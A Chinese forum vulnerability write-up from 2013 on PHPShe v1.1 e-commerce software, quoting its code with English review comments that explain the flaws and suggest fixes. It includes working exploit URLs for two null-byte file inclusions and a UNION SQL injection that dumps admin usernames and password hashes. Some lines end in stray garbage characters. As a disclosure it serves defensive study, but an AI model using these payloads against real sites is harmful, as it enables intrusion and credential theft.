
phpshe v1.1多处SQL注入和文件包含漏洞Getshell

发表于 2013-4-19 19:01:54
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By     : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 参数传输整体概览
// common.php — request-parameter import.
// Every key of $_GET / $_POST / $_SESSION / $_COOKIE is turned into a
// prefixed global ($_g_*, $_p_*, $_s_*, $_c_*) by extract(). The only
// processing visible here is pe_trim() (presumably whitespace trimming) and,
// on magic_quotes builds, pe_stripslashes(); no SQL or path escaping happens
// at this layer, so each consumer of a $_g_*/$_p_*/$_c_* value has to escape
// or whitelist it itself — the injection and include points quoted later in
// this post are exactly the places where that was not done.
// NOTE(review): get_magic_quotes_gpc() is deprecated since PHP 7.4 and gone
// in 8.0.
if (get_magic_quotes_gpc()) {
    !empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
    !empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
    !empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
// Cookies are imported the same way, so every $_c_* value (e.g. $_c_cart_list
// read by index.php) is client-controlled input.
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
0×01 文件包含漏洞
<?php
// index.php (首页文件) — front controller: loads caches, computes the cart
// count, then dispatches to the requested module file.
include('common.php');
$cache_category = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class = cache::get('class');
$cache_ad = cache::get('ad');
$cache_link = cache::get('link');
$cache_page = cache::get('page');
$web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array();
// Cart item count: DB lookup for a logged-in user, otherwise decoded from the
// cart_list cookie. NOTE(review): unserialize() is applied to $_c_cart_list,
// which common.php imports straight from $_COOKIE — that is untrusted
// deserialisation; a JSON or plain-integer cookie would remove the exposure.
$cart_num = pe_login('user') ? $db->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
// Dispatch to module/<module>/<mod>.php. In the routing quoted from
// common.php, $module stays 'index' but $mod is copied from $_POST/$_GET with
// no whitelist, so the client picks this path segment ("鸡肋" = low impact in
// the author's view; the %00 truncation used in the exp is rejected by PHP
// from 5.3.4 on). Fix: accept $mod only if it matches the module's known
// action names (at minimum /^[a-z0-9_]+$/) before this include().
include("{$pe['path_root']}module/{$module}/{$mod}.php");  // $mod is user-controlled → (low-impact) file inclusion
pe_result();
?>
//common.php 文件，第 15 行开始：url 路由配置
// url 路由 (routing): defaults first, then POST overrides GET overrides default.
$module = $mod = $act = 'index';
// NOTE(review): $mod/$act/$id are read from the raw superglobals (not the
// trimmed $_p_*/$_g_* copies) and are never whitelisted or character-checked;
// $mod is later interpolated into index.php's include() path. Mitigation:
// restrict $mod (and $act) to the known action names before use.
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
// $id has no default on the line above, so it stays null when neither
// parameter is sent; consumers cast it (e.g. intval($id) in product.php).
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
0×02 搜索关键词 SQL 注入

// product.php — action 'list' (the enclosing switch opens before this excerpt).
case 'list':
    $category_id = intval($id);   // cast to int, so safe to interpolate below
    $info = $db->pe_select('category', array('category_id'=>$category_id));
    // search filters
    $sqlwhere = " and `product_state` = 1";
    pe_lead('hook/category.hook.php');
    if ($category_id) {
        // (the "$sql" prefix of this assignment appears to have been lost in
        // the forum copy; presumably `$sqlwhere .=`.) $category_id is an int
        // here, so this branch is not the injection point.
        where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
    }
    // INJECTION POINT: $_g_keyword is the raw GET parameter (only trimmed in
    // common.php) and is interpolated straight into the LIKE clause.
    // Fix: escape it — pe_dbhold(), used on $_g_id in order.php, looks like
    // the code base's escaping helper — or use a bound parameter.
    $_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; // the keyword variable is not filtered for SQL
    if ($_g_orderby) {
        // NOTE(review): both halves of $_g_orderby are interpolated unescaped
        // into ORDER BY as well; whitelist them against the allowed column
        // names and 'asc'/'desc'.
        $orderby = explode('_', $_g_orderby);
        $sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
    }
    else {
        $sqlwhere .= " order by `product_id` desc";
    }
    // The assembled string goes to pe_selectall(), which runs it through
    // _dowhere() and concatenates the result into the SELECT.
    $info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
    // hot-sale ranking
    $product_hotlist = product_hotlist();
    // current category path
    $nowpath = category_path($category_id);
    $seo = pe_seo($info['category_name']);
    include(pe_tpl('product_list.html'));
//跟进 pe_selectall 函数（数据库层）
// DB layer: builds "select {$field} from `<prefix>{$table}` {$where}" and runs it.
// $where is either an array (product.php passes array('category_id'=>...)
// elsewhere) or a raw string fragment, as the 'list' action above passes it;
// _dowhere() is not shown in this post, and the exp implies a string $where
// reaches the query unescaped. So the caller must escape anything it puts
// into a string $where. $limit_page is presumably the array(per_page, page)
// pair seen at the call site, forwarded to sql_selectall().
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    // build the WHERE clause
    $sqlwhere = $this->_dowhere($where);
    // $field and $table are interpolated raw too; the callers quoted here
    // pass literals for both.
    return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}
//exp
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1& f$ Y/ `7 G0 \0 x9 V4 g

0×03 文件包含漏洞 2

// order.php — action 'pay' (the enclosing switch opens before this excerpt;
// the trailing "}" closes it).
case 'pay':
    $order_id = pe_dbhold($_g_id);   // presumably the DB-escaping helper
    $cache_payway = cache::get('payway');
    // Decode each payment method's stored config. The keys of $cache_payway
    // are the known payway names (e.g. 'bank') — the natural whitelist for
    // the include() further down.
    foreach($cache_payway as $k => $v) {
        $cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
        if ($k == 'bank') {
            $cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
        }
    }
    $order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
    !$order['order_id'] && pe_error('订单号错误...');
    if (isset($_p_pesubmit)) {
        // NOTE(review): $_p_info is the whole POST "info[...]" array, written
        // to the order row as-is; if pe_update() maps every key to a column,
        // the client decides which order columns get updated (mass
        // assignment). Pick the allowed keys explicitly instead.
        if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
            $info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
            foreach ($info_list as $v) {
                $order['order_name'] .= "{$v['product_name']};";
            }
            echo '正在为您连接支付网站,请稍后...';
            // INCLUDE POINT: $_p_info['order_payway'] is the raw POST value
            // (only trimmed in common.php) and is never checked against
            // $cache_payway, so it selects an arbitrary path segment.
            // Fix: reject the request unless
            // isset($cache_payway[$_p_info['order_payway']]) — before the
            // pe_update() above as well as before this include().
            include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
        }// once everything above passes, the (low-impact, "鸡肋") include runs
        else {
            pe_error('支付错误...');
        }
    }
    $seo = pe_seo('选择支付方式');
    include(pe_tpl('order_pay.html'));
    break;
}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>) x- k7 v$ \! K8 k2 p# f- x
